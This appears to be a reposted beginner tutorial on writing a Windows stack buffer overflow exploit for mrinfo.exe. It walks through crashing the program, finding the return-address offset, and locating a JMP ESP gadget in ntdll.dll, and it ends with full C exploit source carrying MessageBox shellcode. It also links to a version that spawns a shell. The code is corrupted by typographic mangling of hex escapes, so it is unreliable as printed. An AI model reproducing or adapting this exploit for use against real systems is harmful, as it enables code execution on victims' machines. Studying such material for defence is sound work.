Writing exploit BoF on Windows

This is a tutorial about writing exploit. We will use Mrinfo.exe Buffer for learning. nice paper for noobs . step by step with pictures . source : coromputer.net (read more …) Tools : – Debugger, we use OllyDbg but any others will be ok. – WinHex – Compiler ################################################################## For beginning, we have to find informations about hole that we will want exploit. There, we will use a simple hole in Mrinfo. The first thing to do is to find how create the buffer overflow on the computer. For this, the most of time, we have to find the advisory on k-otik or packetstormsecurity for example. In our case, we can read into the advisory “Mrinfo.exe is a tool used for Routing Multicast. There is a buffer overflow hole in Mrinfo.exe, the bug seems to be a bad handling of “-i” and “-n” settings that badly manage the values superior of 53 characters.” We have to start mrinfo.exe with -1 [53 char] (sure, without these “[]“), for reproducing the bug. So, we reproduced the bug, but we don’t know if we can be able to do something with that. For knowing, we will check is we can crush EIP or not. I will show you how doing that with OllyDbg but we can do that with Visual Studio. First, we have to choose which program we will debug, there, sure, we will use mrinfo.exe. File -> Open or F3, we go in system32 repertory and set -i [60A] for argument a little bit over the buffer into the advisory because our goal is to crash the program but too to crush EIP. The program is starting but not execute. At this time, we have to press F9 (or blue arrow in tools bar). So, EIP is on 41414141 (41 = Hexa value for A in Ascii) but we can also see a part of our buffer directly into ESP. Our next goal is to learn the exact position of the characters that we will crush EIP and for that the only thing that we can do is to try. So, we start we something like mrinfo.exe -i [55A][10B] (Sure, always into the debugger). EIP select 42424242 (BBBB). Our RET will be situate between the characters 55 and 65. We will try mrinfo.exe -i [55A]ZZZZ[6B] and there, EIP select 425A5A5A (BZZZ). There is a B of too into the buffer, The characters of RET are 57 58 59 and 60. At this time, we know that our buffer will be like [56A][RET]… We have to find the place into the beginning of our shellcode and we will finally have the complete structure of our buffer. There, that will be not too hard, we will use a technic that we will also use to find the position of the RET. So, for that, we will start mrinfo.exe with -i [56A][ZZZZ][BCDEFGHIJKLMNOPQRSTUVWXY] for setting. In our case, we have chance, ESP select after our RET but it isn’t always the case, if we have enough place, we can also drop this step and simply add NOP into our buffer just after the RET and before the shellcode. Now, we know how crash the program and that can be easily set our shellcode into ESP, we also know the position of our RET and of the shellcode into the buffer. It’s time to code ! What our exploit will have to do ? We will have to create a buffer with our shellcode and our RET. Next, we will have to execute mrinfo with -i and our buffer for setting, for do that we will create a buffer with sprintf() and execute it with system(). And our buffer ? We will have to have a RET and a shellcode, we will begin with RET. Previously, we saw that our shellcode can be added to ESP. So, to create a exploit the best is to do select EIP on a JMP ESP or a CALL ESP. Like you surely know, our RET is into the center of our buffer, that can’t contain NULL 0×00 characters. We just have to find our JMP ESP at another adress that will be not like 00XXXXXX. We will use WinHex for read the RAM. So, Start mrinfo.exe with the debugger and after into WinHex, open the RAM or mrinfo Tolls->RAM editor and select mrinfo and open entire memory. Unfortunately, the adresses there is like 00XXXXXX we cannot search a JMP ESP there. Always into Tools-> RAM editor we see that mrinfo run lot of dll like systems dll that they are sometime adresses like 77XXXXXX that will be good for we. So, open msvctr.dll for example. Into Msvctr.dll the adresses are like 77XXXXXX, now we have to check if it have a JMP ESP in. The OP codes a JMP ESP are 0xff 0xe4. We will search into Msvcrt.dll with WinHex Search->Find Hex Value and search FFE4, unfortunately there isn’t in Msvcrt.dll we can search FFD4 (CALL ESP) but we will check into another dll ntdll.dll for example and research another time. Oh ! We have a JMP ESP in ntdll.dll at offset 77F4801C, unfortunately this offset can change of a version to another of Windows and the service pack, but our exploit is local ! We can ask directly our program to find this offset! For that it just have to make a offset = LoadLibrary(“ntdll.dll”) to load the dll. And after we will scan our dll with a loop while(!end) { if((( BYTE *)offset)[i] == ff && (( BYTE *)offset)[i+1] == e4) { sprintf(ret,”%x”,&(( BYTE *)offset)[i]); end= TRUE; } i++; } This loop will search FF and E4 (OP code of JMP ESP) into the library and set this offset into RET. But we can’t set this offset directly like that into our var because we have get it on 8 char and we have to set it to 4 char .. for(y=0;y<10;y++) { nret[y]=ret[y]-48; if(nret[y]>10){ switch((nret[y]-33)) { case 16: nret[y]=0×0a; break; case 17: nret[y]=0×0b; break; case 18: nret[y]=0×0c; break; case 19: nret[y]=0×0d; break; case 20: nret[y]=0×0e; break; case 21: nret[y]=0×0f; break; } } memset(ret,0,sizeof(ret)); ret[0]=nret[0]*0×10+nret[1]; ret[1]=nret[2]*0×10+nret[3]; ret[2]=nret[4]*0×10+nret[5]; ret[3]=nret[6]*0×10+nret[7]; So the question of RET is answered. shellcode is left, for our example we will use a little simple shellcode that popup a MessageBox. char shellcode[]= “x90×90x90×90x90×90x90×90x90×90x90×90x90×90x90×90x90″ “x33xc9″ “x51″ “x51″ “x51″ “x51″ “xb8xd7xadxd3×77″ “xffxd0″ “xffx57xe8″; There are some NOP before to make it more portable in the case or ESP would not point on the beginning of the shellcode but a few bytes further. Now make the buffer that it will send to system(). It have to resemble like « mrinfo.exe -i [56A][RET][SC] » So : sprintf(buffer,”mrinfo -i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%s”,ret[3],ret[2],ret[1],ret[0],shellcode); give it to system() system(buffer); That’s it, now our exploit , it will be able to work Win2k On WinXP, There is a access violation, but it isn’t important because our only goal was to write a exploit. When mrinfo.exe crash (on winxp) made debogage and choose continuous. And ! ! ! This is our Message box of our shellcode, mrinfo.exe have execute our code. ################################################################## This tutorial is the image of that which wrote it, imperfect, So don’t hesitate to contact me if you note an error or if you have a comment to make at scurt@coromputer.net You will be able to find a version improved of the exploit with a SC which pop Shell on our site. http://www.coromputer.net/files/mrinfo2k.c Special thanks to Coromputer team and special greet to Decryptus, Mik_ and kralor without which nothing could have been possible. Find us on www.coromputer.net or on irc #coromputer @ undernet ################################################################## // The full code used into this text : #include “windows.h” #include “conio.h” int main() { int offset; BYTE ff = 0xff; BYTE e4 = 0xe4; BOOL end = FALSE; char ret[10]={0}; int nret[10]={0}; int i=0; int y=0; char buffer[128]; char shellcode[]= “x90×90x90×90x90×90x90×90x90×90x90×90x90×90x90×90x90″ “x33xc9″ “x51″ “x51″ “x51″ “x51″ “xb8xd7xadxd3×77″ “xffxd0″ “xffx57xe8″; // this shellcode just popup a new blank MessageBox 33char //56 char before the ret char* pshellcode; offset=(int)LoadLibrary(“ntdll.dll”); while(!end) { if((( BYTE *)offset)[i] == ff && (( BYTE *)offset)[i+1] == e4) { printf(“%xn”,&(( BYTE *)offset)[i]); sprintf(ret,”%x”,&(( BYTE *)offset)[i]); end= TRUE; } i++; } for(y=0;y<10;y++) { nret[y]=ret[y]-48; if(nret[y]>10){ switch((nret[y]-33)) { case 16: nret[y]=0×0a; break; case 17: nret[y]=0×0b; break; case 18: nret[y]=0×0c; break; case 19: nret[y]=0×0d; break; case 20: nret[y]=0×0e; break; case 21: nret[y]=0×0f; break; } } } memset(ret,0,sizeof(ret)); ret[0]=nret[0]*0×10+nret[1]; ret[1]=nret[2]*0×10+nret[3]; ret[2]=nret[4]*0×10+nret[5]; ret[3]=nret[6]*0×10+nret[7]; sprintf(buffer,”mrinfo -i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%s”,ret[3],ret[2],ret[1],ret[0],shellcode); system(buffer); getch(); return 0; } Source : coromputer.net